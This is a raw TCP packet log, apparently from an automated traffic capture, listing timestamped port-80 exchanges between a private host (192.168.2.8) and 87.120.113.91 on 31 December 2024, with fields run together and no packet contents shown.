                                                        Dec 31, 2024 09:28:26.953629017 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.953828096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953839064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953850031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953860044 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953870058 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953879118 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.953887939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953896046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.953905106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953916073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953926086 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.953938007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953943968 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.953953028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953964949 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.953974009 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954001904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954181910 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954193115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954202890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954212904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954222918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954231977 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954241991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954250097 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954260111 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954271078 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954281092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954288960 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954291105 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954312086 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954324007 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954329014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954339981 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954349995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954360962 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954369068 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954385042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954394102 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954402924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954412937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954420090 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954428911 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954440117 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954452038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954461098 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954474926 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954484940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954519033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954740047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954751015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954761028 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954771996 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954782963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954792023 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954801083 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954809904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954818964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954849958 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954881907 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954893112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954910994 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954919100 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954929113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954941034 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954946995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954957008 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954962969 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954977036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.954991102 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.954998970 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955008984 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955020905 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955027103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955034971 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955044985 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955059052 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955064058 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955073118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955082893 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955094099 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955101013 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955110073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955122948 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955130100 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955147028 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955668926 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955679893 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955689907 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955701113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955709934 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955718040 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955728054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955734968 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955753088 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955759048 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955768108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955790997 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955799103 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955810070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955818892 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955828905 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955837011 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955849886 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955856085 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955864906 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955877066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955887079 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955897093 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955909014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955916882 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955925941 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955936909 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955945015 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955957890 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955970049 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.955976009 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955986023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.955996037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956006050 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956012964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956023932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956032038 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956054926 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956286907 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956298113 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956309080 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956320047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956329107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956340075 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956346989 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956356049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956366062 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956373930 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956382990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956398964 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956408978 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956433058 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956459999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956471920 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956486940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956499100 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956506014 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956515074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956525087 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956532001 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956542015 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956552029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956562042 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956569910 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956579924 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956588030 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956597090 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956608057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956618071 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956625938 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956634998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956645012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956653118 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956661940 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956670046 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.956679106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.956698895 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957221031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957231998 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957242012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957252979 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957263947 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957272053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957283020 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957298040 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957305908 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957314014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957329035 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957339048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957348108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957355976 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957365036 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957372904 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957382917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957400084 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957623005 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957633018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957643986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957653999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957662106 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957670927 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957681894 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957689047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957699060 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957709074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957720041 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957727909 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957735062 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957743883 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957751989 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957767963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957783937 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957793951 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957804918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957813978 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957823992 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957839012 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957849979 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957861900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957875967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957881927 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957890987 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957901001 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957909107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957920074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957930088 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957936049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957947016 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957953930 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957962990 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957973003 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.957979918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.957989931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958000898 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958008051 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958017111 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958028078 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958039045 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958048105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958065033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958070993 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958080053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958102942 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958447933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958461046 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958470106 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958481073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958492041 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958498955 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958513975 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958523035 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958532095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958543062 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958549976 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958564997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958575010 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958590031 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958604097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958612919 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958627939 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958642960 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958651066 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958662033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958671093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958681107 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958688974 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958698034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958707094 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958715916 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958729029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958734989 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958744049 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958754063 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958765030 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958771944 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958782911 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958789110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958798885 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958810091 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958825111 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958832026 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958842039 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:26.958859921 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:26.958869934 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.111224890 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116118908 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116132021 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116143942 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116188049 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116255999 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116266966 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116277933 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116291046 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116329908 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116329908 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116415024 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116425991 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116436958 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116449118 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116456032 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116466045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116486073 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116497040 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116712093 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116723061 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116733074 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116744995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116755009 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116763115 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116774082 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116781950 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116791010 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116801023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116811037 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116820097 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116828918 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.116837025 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.116878986 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117049932 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117060900 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117070913 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117083073 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117098093 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117110014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117115021 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117124081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117134094 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117144108 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117156029 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117163897 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117172956 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117187023 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117193937 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117202997 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117214918 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117219925 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117232084 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117238998 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117265940 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117532969 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117543936 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117554903 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117564917 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117575884 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117580891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117593050 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117603064 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117616892 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117623091 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117633104 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117643118 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117650032 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117657900 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117674112 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117683887 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117696047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117707014 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117712975 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:27.117722034 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117732048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:27.117738962 CET4970880192.168.2.887.120.113.91
